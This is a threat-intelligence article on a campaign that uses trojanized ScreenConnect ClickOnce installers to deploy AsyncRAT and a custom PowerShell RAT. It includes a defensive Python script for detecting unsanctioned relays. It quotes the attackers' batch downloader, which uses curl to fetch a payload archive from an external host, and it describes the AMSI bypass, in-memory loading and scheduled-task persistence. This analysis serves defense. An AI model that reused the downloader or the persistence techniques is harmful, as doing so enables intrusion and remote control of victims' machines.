A recent cyber campaign has been identified, targeting U.S.-based organizations via trojanized ConnectWise ScreenConnect installers. This development marks a significant advancement in the misuse of remote monitoring and management (RMM) tools.
Since March 2025, these attacks have increased in frequency and technical complexity, utilizing legitimate administrative software to establish persistent footholds within corporate networks.
The campaign uses deceptive social engineering tactics, distributing malicious installers disguised as legitimate documents, such as “agreement_support-pdf.Client.exe” and “Social_Security_Statement_Documents_386267.exe.”
These files appear as genuine support materials or financial documents, exploiting user trust to gain initial system access.
Upon execution, the installers establish connections to attacker-controlled servers, effectively converting victims’ machines into remotely accessible assets.
This campaign is distinct from previous ScreenConnect abuses due to the deployment of ClickOnce runner installers instead of traditional full installers.
Researchers at Acronis identified that these evolved installers lack embedded configuration data, fetching components and settings at runtime from compromised infrastructure.
This architectural change significantly complicates detection efforts, as traditional static analysis methods that rely on identifying suspicious embedded configurations become ineffective.
The threat actors exhibit notable operational complexity by concurrently deploying multiple remote access trojans (RATs) on compromised systems.
Within minutes of ScreenConnect installation, automated processes deploy both the well-documented AsyncRAT and a custom PowerShell-based RAT developed specifically for these campaigns.
This dual-deployment strategy indicates either redundancy planning or shared infrastructure among multiple threat groups.
Advanced Infection Chain Analysis
The technical sophistication of this campaign is evident through the examination of its multi-stage infection process.
The initial ClickOnce installer connects to attacker infrastructure using parameters such as “e=Support&y=Guest&h=morco.rovider.net&p=8041,” establishing communication with command-and-control servers hosted on compromised virtual private servers.
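Because the runner installers carry no embedded configuration, the relay host and port only become visible on the client's command line at launch. The following added detection example (not code from the campaign or from Acronis) parses ScreenConnect launch parameters of the form shown above out of constructed process-creation records and flags relays outside an assumed allowlist, as well as executables named to look like documents; the sanctioned relay and file paths are placeholders.

```python
import ntpath
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Constructed sample process-creation command lines (not real telemetry).
# A ScreenConnect client receives its relay on the command line as
# e=<session type>&y=<process type>&h=<relay host>&p=<port>.
SAMPLE_CMDLINES = [
    r'"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=support.example-corp.com&p=443&k=PLACEHOLDER"',
    r'"C:\Users\victim\Downloads\agreement_support-pdf.Client.exe" '
    r'"?e=Support&y=Guest&h=morco.rovider.net&p=8041"',
    r'"C:\Windows\System32\notepad.exe" C:\Users\victim\notes.txt',
]

# Relay hosts the organisation actually licenses (assumed value for this example).
SANCTIONED_RELAYS = {"support.example-corp.com"}

# Executables named to look like support or financial documents.
DOC_LURE_RE = re.compile(r"(pdf|docx?|statement|agreement|invoice).*\.exe$", re.I)
# Single-letter key=value pairs following the '?' that ScreenConnect clients expect.
PARAM_RE = re.compile(r'\?((?:[a-z]=[^"\s&]*)(?:&[a-z]=[^"\s&]*)*)', re.I)


def parse_screenconnect_params(cmdline: str) -> Optional[Dict[str, str]]:
    """Extract the single-letter relay parameters, or None if none are present."""
    m = PARAM_RE.search(cmdline)
    if not m:
        return None
    return {k: v[0] for k, v in parse_qs(m.group(1)).items()}


def assess(cmdline: str) -> List[str]:
    """Return findings for one command line; an empty list means nothing flagged."""
    params = parse_screenconnect_params(cmdline)
    if not params or "h" not in params:
        return []  # not a ScreenConnect client launch
    findings = []
    if params["h"].lower() not in SANCTIONED_RELAYS:
        findings.append(f"unsanctioned relay {params['h']}:{params.get('p', '?')}")
    exe_match = re.match(r'"([^"]+)"', cmdline)
    exe_name = ntpath.basename(exe_match.group(1)) if exe_match else ""
    if DOC_LURE_RE.search(exe_name):
        findings.append(f"document-lure filename {exe_name}")
    return findings


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(assess(line) or "ok", "<-", line[:60])
```

In production the same parsing applies to Sysmon Event ID 1 or EDR process-creation telemetry, with the allowlist populated from the relays the organisation's own ScreenConnect tenant uses.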
Following successful installation, the malware leverages ScreenConnect’s built-in automation capabilities to execute a batch file designated as “BypaasaUpdate.bat.”
This initial payload functions as a sophisticated downloader, retrieving a compressed archive containing multiple encoded components:
rem Downloader stage: fetch the archive of encoded components into ProgramData
set LINK=https://guilloton.fr/x.zip
set ZIP_PATH=%ProgramData%\ali.zip
curl -s -o "%ZIP_PATH%" %LINK%
The downloaded archive contains strategically named files including “1.txt” (containing AsyncRAT), “pe.txt” (AMSI bypass mechanisms), and “Skype.ps1” (PowerShell execution script).
This naming convention represents deliberate obfuscation designed to evade signature-based detection systems.
The persistence mechanism demonstrates particular ingenuity, establishing scheduled tasks that execute every minute while implementing mutex checking to prevent duplicate instances.
The PowerShell script “Skype.ps1” loads encoded .NET assemblies directly into memory, bypassing traditional file-based detection methods while maintaining continuous system access for threat actors.
This campaign signifies a concerning evolution in RMM tool weaponization, combining legitimate software abuse with sophisticated evasion techniques to establish persistent organizational access.